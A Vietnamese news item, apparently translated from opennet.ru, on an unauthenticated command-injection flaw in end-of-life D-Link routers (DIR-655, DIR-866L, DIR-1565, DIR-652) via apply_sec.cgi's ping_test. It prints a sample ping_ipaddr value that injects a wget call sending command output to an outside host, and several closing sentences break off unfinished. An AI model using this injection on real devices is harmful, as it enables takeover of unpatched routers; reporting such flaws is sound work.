Trong bộ định tuyến không dây D-Link
Điều thú vị là, theo các nhà phát triển chương trình cơ sở, lệnh gọi “ping_test” chỉ nên được thực hiện sau khi xác thực, nhưng trên thực tế, nó vẫn được gọi trong mọi trường hợp, bất kể đăng nhập vào giao diện web. Cụ thể, khi truy cập tập lệnh apply_sec.cgi và truyền tham số “action=ping_test”, tập lệnh sẽ chuyển hướng đến trang xác thực, nhưng đồng thời thực hiện hành động liên quan đến ping_test. Để thực thi mã, một lỗ hổng khác đã được sử dụng trong chính ping_test, gọi tiện ích ping mà không kiểm tra chính xác tính chính xác của địa chỉ IP được gửi để kiểm tra. Ví dụ: để gọi tiện ích wget và chuyển kết quả của lệnh “echo 1234” sang máy chủ bên ngoài, chỉ cần chỉ định tham số “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Sự hiện diện của lỗ hổng đã được xác nhận chính thức trong các mô hình sau:
- DIR-655 với phần sụn 3.02b05 trở lên;
- DIR-866L với phần sụn 1.03b04 trở lên;
- DIR-1565 với phần sụn 1.01 trở lên;
- DIR-652 (không cung cấp thông tin về các phiên bản phần mềm có vấn đề)
Thời gian hỗ trợ cho các dòng máy này đã hết nên D-Link
Sau đó người ta phát hiện ra rằng lỗ hổng này cũng
Nguồn: opennet.ru